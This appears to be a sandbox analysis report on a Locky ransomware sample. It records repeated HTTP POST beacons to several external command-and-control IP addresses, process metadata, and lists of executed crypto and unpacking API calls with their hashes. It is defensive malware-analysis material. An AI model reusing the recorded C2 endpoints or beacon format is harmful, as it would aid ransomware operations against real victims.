May 23, 2024 01:13:30.810343981 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	37.143.9.154	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:13:52.300122023 CEST	469	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://37.143.9.154/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 37.143.9.154 Content-Length: 613 Connection: Keep-Alive
May 23, 2024 01:13:52.300122976 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+
May 23, 2024 01:13:53.120646000 CEST	1236	IN	HTTP/1.0 403 Access Forbidden Date: Wed, 22 May 2024 23:13:52 GMT Server: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1k mod_fcgid/2.3.9 PHP/7.2.24 X-Powered-By: PHP/7.2.24 Content-Length: 2011 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 3e 20 64 69 76 20 3e 20 64 69 76 20 3e 20 64 69 76 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html> <html style="height: 100%;"> <head> <meta charset="UTF-8"> <title>403 Access Forbidden</title> <style> @media screen and (max-width: 800px) { body > div > div > div div { display: block !important; padding-right: 0 !important; } body { text-align: center !important; } } </style> </head> <body style="height: 90%;"> <div style="display: flex; align-items: center; justify-content: center; height: 90%;"> <div style="background-color: #eee; width: 70%; border: solid 3px #ddd; padding: 1.5em 3em 3em 3em; font-family: Arial, Helvetica, sans-serif;"> <div style="display: table-row;"> <div style="display: table-cell; font-size: 150px; color: red; vertical-align: top; padding-right: 50px;">
May 23, 2024 01:13:53.126065016 CEST	1029	IN	Data Raw: 20 20 20 20 20 20 20 20 26 23 39 39 39 35 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c Data Ascii: ✋ </div> <div style="display: table-cell; vertical-align: top;"> <h1 style="margin-top: 0;">We're sorry, you are not allowed to proceed</h1> <p>Your requ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49706	46.17.44.153	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:13:53.178350925 CEST	469	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://46.17.44.153/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 46.17.44.153 Content-Length: 613 Connection: Keep-Alive
May 23, 2024 01:13:53.178380013 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	46.183.165.45	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:14:14.647859097 CEST	471	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://46.183.165.45/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 46.183.165.45 Content-Length: 613 Connection: Keep-Alive
May 23, 2024 01:14:14.647880077 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49709	185.179.190.31	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:14:36.143686056 CEST	473	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://185.179.190.31/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.179.190.31 Content-Length: 613 Connection: Keep-Alive
May 23, 2024 01:14:36.143735886 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49710	37.143.9.154	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:14:57.599658012 CEST	469	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://37.143.9.154/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 37.143.9.154 Content-Length: 613 Connection: Keep-Alive
May 23, 2024 01:14:57.599693060 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+
May 23, 2024 01:14:58.379328012 CEST	1236	IN	HTTP/1.0 403 Access Forbidden Date: Wed, 22 May 2024 23:14:58 GMT Server: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1k mod_fcgid/2.3.9 PHP/7.2.24 X-Powered-By: PHP/7.2.24 Content-Length: 2011 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 3e 20 64 69 76 20 3e 20 64 69 76 20 3e 20 64 69 76 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html> <html style="height: 100%;"> <head> <meta charset="UTF-8"> <title>403 Access Forbidden</title> <style> @media screen and (max-width: 800px) { body > div > div > div div { display: block !important; padding-right: 0 !important; } body { text-align: center !important; } } </style> </head> <body style="height: 90%;"> <div style="display: flex; align-items: center; justify-content: center; height: 90%;"> <div style="background-color: #eee; width: 70%; border: solid 3px #ddd; padding: 1.5em 3em 3em 3em; font-family: Arial, Helvetica, sans-serif;"> <div style="display: table-row;"> <div style="display: table-cell; font-size: 150px; color: red; vertical-align: top; padding-right: 50px;">
May 23, 2024 01:14:58.386002064 CEST	1029	IN	Data Raw: 20 20 20 20 20 20 20 20 26 23 39 39 39 35 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c Data Ascii: ✋ </div> <div style="display: table-cell; vertical-align: top;"> <h1 style="margin-top: 0;">We're sorry, you are not allowed to proceed</h1> <p>Your requ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49711	46.17.44.153	80	6924	C:\Users\user\Desktop\LockyRansom.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 01:14:58.402198076 CEST	469	OUT	POST /imageload.cgi HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://46.17.44.153/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 46.17.44.153 Content-Length: 613 Connection: Keep-Alive
May 23, 2024 01:14:58.402218103 CEST	613	OUT	Data Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+

Target ID:	0
Start time:	19:12:59
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\LockyRansom.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LockyRansom.exe"
Imagebase:	0x400000
File size:	614'400 bytes
MD5 hash:	1720B1748AD7B8AC0BFC1C3636FEAD95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.9%
Total number of Nodes:	177
Total number of Limit Nodes:	12

Executed Functions

Function 005C007E Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005C05EF: VirtualAlloc.KERNEL32(00000000), ref: 005C05FC

VirtualProtect.KERNEL32(?,?,00000004,?,?), ref: 005C00B3
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00000004,?,?), ref: 005C00C3
VirtualProtect.KERNEL32(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 005C010C
VirtualProtect.KERNEL32(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 005C0122
VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 005C0187

Memory Dump Source

Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd

Similarity

API ID: Virtual$Protect$AllocFree
String ID:
API String ID: 3729553426-0
Opcode ID: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
Instruction ID: 816ef9707d5f24e1af2ab16de0e8654e56fb932d79ebc73ddabb0488f435f8c9
Opcode Fuzzy Hash: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
Instruction Fuzzy Hash: 58419272600115EFDB10EFA4CC85F6ABBA9FF84724B25551DF80597292C775EC42CBA0

Function 00415410 Relevance: 6.1, APIs: 4, Instructions: 146
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 0041547D
__CxxThrowException@8.LIBCMT ref: 004154F8
CryptDestroyKey.ADVAPI32 ref: 0041553C
CryptImportKey.ADVAPI32(?,?,?,00000000,?), ref: 00415553

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Crypt$DestroyErrorException@8ImportLastThrow
String ID:
API String ID: 3526249013-0
Opcode ID: f09328df2215586b71cf69b723c466f55bfa3c0ce29ebb0ee16f9de38e4b6e4c
Instruction ID: 75a59a1b6f99783ae68cbfa4b89e1ee5fa7e17af1fbeaeef52267452b1ef76cb
Opcode Fuzzy Hash: f09328df2215586b71cf69b723c466f55bfa3c0ce29ebb0ee16f9de38e4b6e4c
Instruction Fuzzy Hash: 2131137019EA04EFCA24CA409480AF9376FABDB342B713457940F5A11AD37C59C7BA5F

Function 0041544C Relevance: 6.1, APIs: 4, Instructions: 119
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 0041547D
__CxxThrowException@8.LIBCMT ref: 004154F8
CryptDestroyKey.ADVAPI32 ref: 0041553C
CryptImportKey.ADVAPI32(?,?,?,00000000,?), ref: 00415553

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Crypt$DestroyErrorException@8ImportLastThrow
String ID:
API String ID: 3526249013-0
Opcode ID: 2106f5f472efa31c43e07aa171748dc673d1452ca9903e8a0b0f42dcb77937e3
Instruction ID: 83b2779ccbba15b0164695fcff30a536cef25776ce6d9a38a2236a95441dfb84
Opcode Fuzzy Hash: 2106f5f472efa31c43e07aa171748dc673d1452ca9903e8a0b0f42dcb77937e3
Instruction Fuzzy Hash: 2C31047019EA05EFCA14CA44D480AF9376FABCB342B717417A40F5611AD33C59C7AA5F

Function 00415310 Relevance: 4.6, APIs: 3, Instructions: 109
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000000,00000000,?,?), ref: 00415329
__CxxThrowException@8.LIBCMT ref: 0041534A

Part of subcall function 00401946: KiUserExceptionDispatcher.NTDLL(00000000,m7@,?,csm,?,0040376D,?,0047D0DC,?,E06D7363,1FFFFFFF,19930522), ref: 00401988

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,?,?), ref: 00415377

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: AcquireContextCryptDispatcherErrorExceptionException@8LastThrowUser
String ID:
API String ID: 809346598-0
Opcode ID: 7059ad6988ae182a42066c6519d19a8cd95a1f6f774e0fa497de70c6c3be9217
Instruction ID: d44a424a447398ebdc4cad06fd6f66df108f5d79a041d891c50ca013437860c6
Opcode Fuzzy Hash: 7059ad6988ae182a42066c6519d19a8cd95a1f6f774e0fa497de70c6c3be9217
Instruction Fuzzy Hash: 9621167059E90DEEC6148A5088408F5B36DABCB3C137138179C6FA7201D3E89AC7B66F

Function 005C01C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 005C0217
VirtualProtect.KERNEL32(?,?,00000004,?,00000000,?,00000000), ref: 005C0234
GetProcAddress.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 005C025F
VirtualProtect.KERNEL32 ref: 005C026D

Strings

+, xrefs: 005C0225

Memory Dump Source

Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: +
API String ID: 3300690313-2126386893
Opcode ID: 042d06ce7d3c35a719b21ac66d89e9520a0058648d5d4c5d68ea65a2ee1c511c
Instruction ID: 1ec89ed9505e3b039716eb33b0fbee48f14dc5bdb1791e7ae4bc48dc0a4bccde
Opcode Fuzzy Hash: 042d06ce7d3c35a719b21ac66d89e9520a0058648d5d4c5d68ea65a2ee1c511c
Instruction Fuzzy Hash: 3721DF7A800210AFEB218EE4CC4DF677FA8FF42720B19555DED55EB181D621ED019791

Function 0040347F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___BuildCatchObject.LIBCMT ref: 00403492

Part of subcall function 004033ED: ___BuildCatchObjectHelper.LIBCMT ref: 00403423

_UnwindNestedFrames.LIBCMT ref: 004034A9
___FrameUnwindToState.LIBCMT ref: 004034B7

Strings

csm, xrefs: 00403481
csm, xrefs: 0040348E, 004034A3, 004034B6, 004034D4, 004034E4

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: f0a11c02f04ef08c4b7e7f2e79c1bf3885e9fdf9dc8db0eb40d1fdd7ce84d278
Instruction ID: 5fc37cf1c4be021de61a4d0c28a1b7bb2591f3fb715b9b6c574538197e9c30bc
Opcode Fuzzy Hash: f0a11c02f04ef08c4b7e7f2e79c1bf3885e9fdf9dc8db0eb40d1fdd7ce84d278
Instruction Fuzzy Hash: 6F01E831001109BBDF129E51CD45EAB7E6AEF14359F048026BD18251A1D73A9AB1DBA9

Function 005C01F3 Relevance: 4.6, APIs: 3, Instructions: 54
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 005C0217
VirtualProtect.KERNEL32(?,?,00000004,?,00000000,?,00000000), ref: 005C0234
GetProcAddress.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 005C025F
VirtualProtect.KERNEL32 ref: 005C026D

Memory Dump Source

Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: b2eb1b8fa864b43ad686802875ac91e386237f25713a69753ad54731c4631e36
Instruction ID: 113155464035838254582bb9ac7342e13bb7715cbaeaf1451200005e23c41ea2
Opcode Fuzzy Hash: b2eb1b8fa864b43ad686802875ac91e386237f25713a69753ad54731c4631e36
Instruction Fuzzy Hash: 5C014C76500624AFDB314E99CC48F77BAADFF45B20B19561CBC5AE7280D721ED048691

Function 0042B880 Relevance: 3.1, APIs: 2, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00402C24,00400000,00000000,00000000,0000000A), ref: 0042B8A2
ExitProcess.KERNEL32 ref: 0042B8C2

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ExitHandleModuleProcess
String ID:
API String ID: 3701513920-0
Opcode ID: 4ddf0aaea5bf63d9cc2b16d17124679eb37e058fb133eb14cd2cb6b7844cd9bd
Instruction ID: a1f141e45b79c4148c8613c88d2f8cc924be321113b5ed40b3e0555ce0563709
